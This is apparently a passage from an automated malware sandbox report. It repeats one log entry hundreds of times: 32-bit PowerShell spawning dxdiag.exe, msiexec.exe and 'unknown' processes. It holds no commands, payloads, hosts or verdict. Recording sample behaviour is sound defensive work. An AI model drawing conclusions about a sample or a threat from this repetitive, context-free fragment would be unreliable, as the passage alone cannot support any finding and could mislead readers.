Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
